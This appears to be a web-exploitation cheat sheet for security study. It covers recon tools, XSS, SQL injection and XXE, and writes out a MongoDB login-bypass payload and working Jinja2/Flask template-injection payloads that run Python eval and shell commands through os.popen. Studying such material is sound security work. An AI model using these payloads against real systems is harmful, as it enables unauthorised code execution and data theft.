- PayloadAllTheThings Github
- Postman
- Insomnia
- dirb (run dirb on terminal)
- dirbuster (requires GUI)
- gobuster (similar tool)
- dirsearch (faster alternative to dirb) GitHub
- dirhunt GitHub
- Burp Suite (requires GUI) Website
- wget
- Happens when an application parses user-supplied data from XML files, which can be modified to be malicious Website
- Commonly found in PHP web applications (e.g. through WordPress plugins)
- Vulnerable websites can allow you to access local files through directory traversal
- Look out for places where you can supply a file path and the file is then served as a download or printed to the page
- Stored XSS
  - Website uses external resources that contain malicious code
  - If an SVG with an XSS payload is placed in an iframe or embed of a website, it can be executed
- Reflected XSS
  - When queries to a website are handled and returned in an unsafe way
- DOM based XSS
  - Client side attack: the browser executes a payload that didn't come from the server
- Try using one (single or double) quote in the input and see if there are any errors
  - If an error is returned, the website might be vulnerable
- Union based attack
  - Application displays the output of the query, allowing you to extract information from the database
- Error based attack
  - Application returns an error with details about the query, helping you to craft queries that bypass checks
- Resources
- In MongoDB + NodeJS web apps
  - Query for login details:

    ```javascript
    db.users.find({username: username, password: password});
    ```

  - Malicious input:

    ```json
    {
      "username": {"$gt": ""},
      "password": {"$gt": ""}
    }
    ```

  - `{"$gt": ""}` matches any non-empty string, since `$gt` is a query selector that compares the field against `""`, so both conditions evaluate to true for every user
- Make sure input gets sanitised as a string
- Remove `$` and `.` to prevent query selectors
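The two mitigations above, written out as an added example (not code from the original notes): `requireString` enforces the string-only rule for login fields, and `stripOperators` drops `$`/`.` keys from input that legitimately has to be an object. The inputs at the bottom are constructed, and the function names are assumptions for this example.

```javascript
// Added example: sanitising MongoDB login input in a Node app.

// Mitigation 1: only accept strings for fields that must be strings.
// A JSON body of {"username": {"$gt": ""}} arrives as an object, not a
// string, so rejecting non-strings blocks operator injection outright.
function requireString(value, field) {
  if (typeof value !== 'string') {
    throw new TypeError(`${field} must be a string`);
  }
  return value;
}

// Mitigation 2: for input that may legitimately be an object (e.g. a
// filter built from JSON), drop any key that starts with '$' or contains
// '.', so no query selectors or dotted paths reach the query. Recurses
// into nested objects and arrays; scalars pass through unchanged.
function stripOperators(value) {
  if (Array.isArray(value)) return value.map(stripOperators);
  if (value !== null && typeof value === 'object') {
    const clean = {};
    for (const [k, v] of Object.entries(value)) {
      if (k.startsWith('$') || k.includes('.')) continue; // drop selector keys
      clean[k] = stripOperators(v);
    }
    return clean;
  }
  return value;
}

// Builds the login filter from a parsed JSON body using mitigation 1.
// Returns a plain object suitable for db.users.find(...).
function buildLoginQuery(body) {
  return {
    username: requireString(body.username, 'username'),
    password: requireString(body.password, 'password'),
  };
}

// Constructed inputs: a normal login and the payload shown in the notes.
const benignLogin = { username: 'alice', password: 'hunter2' };
const maliciousLogin = { username: { $gt: '' }, password: { $gt: '' } };
```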
- Identify the template engine:

  ```jinja
  {{ 7*'7' }}
  ```

  - Twig: 49
  - Jinja2: 7777777

  ```jinja
  {{ 7 }}
  ```

  - Golang: 7

- For Flask servers:
  - Get config:

    ```jinja
    {{config}}
    ```

  - Python RCE:

    ```jinja
    {% for c in [].__class__.__base__.__subclasses__() %}
    {% if c.__name__ == 'catch_warnings' %}
    {% for b in c.__init__.__globals__.values() %}
    {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
    {{ b['eval']('<Python code here>') }}
    {% endif %}
    {% endif %}
    {% endfor %}
    {% endif %}
    {% endfor %}
    ```

  - Execute shell statements:

    ```jinja
    {% for c in [].__class__.__base__.__subclasses__() %}
    {% if c.__name__ == 'catch_warnings' %}
    {% for b in c.__init__.__globals__.values() %}
    {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
    {{ b['eval']('__import__("os").popen("<SHELL STATEMENT HERE>").read()') }}
    {% endif %}
    {% endif %}
    {% endfor %}
    {% endif %}
    {% endfor %}
    ```

  - Get all classes:

    ```jinja
    {{ ''.__class__.__mro__[2].__subclasses__() }}
    ```

  - Get local/global variables (same construction as the Python RCE above):

    ```jinja
    {% for c in [].__class__.__base__.__subclasses__() %}
    {% if c.__name__ == 'catch_warnings' %}
    {% for b in c.__init__.__globals__.values() %}
    {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
    {{ b['eval']('dict(globals(), **locals())') }}
    {% endif %}
    {% endif %}
    {% endfor %}
    {% endif %}
    {% endfor %}
    ```

- For Golang:

  ```
  {{.<variable or function here>}}
  ```

  Note that the dot is important.
- Reference/more info GitHub / Translated Version
- Payload for more languages Website
- Payload all the things SSTI Github
- Steps to test for CSRF Guide
- Steps to test for Broken Authentication Guide
- `.htaccess` files are configuration files for the directory they are placed in
- bWAPP, a free and open source deliberately insecure web application Website
- Article explaining various common Python application pitfalls which can be exploited Website
- `robots.txt` contains information telling crawlers which files and directories they are permitted to check; this could potentially reveal hidden files
- `sitemap.xml` contains information about the pages a site has, to help search engines crawl and index the website faster
- Pacu, a web exploitation framework for exploiting configuration flaws in AWS servers GitHub
- [Flask Unsign (Python tool)](https://pypi.org/project/flask-unsign/)